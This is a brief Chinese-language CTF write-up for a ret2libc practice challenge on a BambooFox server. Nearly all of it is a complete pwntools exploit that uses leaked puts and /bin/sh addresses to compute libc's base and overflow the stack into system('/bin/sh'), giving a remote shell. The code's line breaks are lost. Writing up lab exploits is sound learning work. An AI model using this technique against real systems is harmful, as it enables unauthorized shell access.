ret2libc
Description
nc bamboofox.cs.nctu.edu.tw 11002
ret2libc practice
32位动态链接ELF,开了NX
程序有栈溢出,并且甚至直接给出了/bin/sh和puts的地址,因此直接做就行了
exp如下:
from pwn import * context.arch = 'i386' context.os = 'linux' #io = process('./ret2libc') io = remote('bamboofox.cs.nctu.edu.tw', 11002) elf = ELF('./ret2libc') #libc = elf.libc libc = ELF('./libc.so.6') io.recvuntil('The address of "/bin/sh" is ') binsh_addr = int(io.recvline().strip(), 16) info('binsh_addr: ' + hex(binsh_addr)) io.recvuntil('The address of function "puts" is ') puts_addr = int(io.recvline().strip(), 16) info('puts_addr: ' + hex(puts_addr)) libc_base = puts_addr - libc.symbols['puts'] info('libc_base: ' + hex(libc_base)) system_addr = libc_base + libc.symbols['system'] info('system_addr: ' + hex(system_addr)) payload = b'a' * 32 + p32(system_addr) + p32(0) + p32(binsh_addr) io.sendline(payload) io.interactive()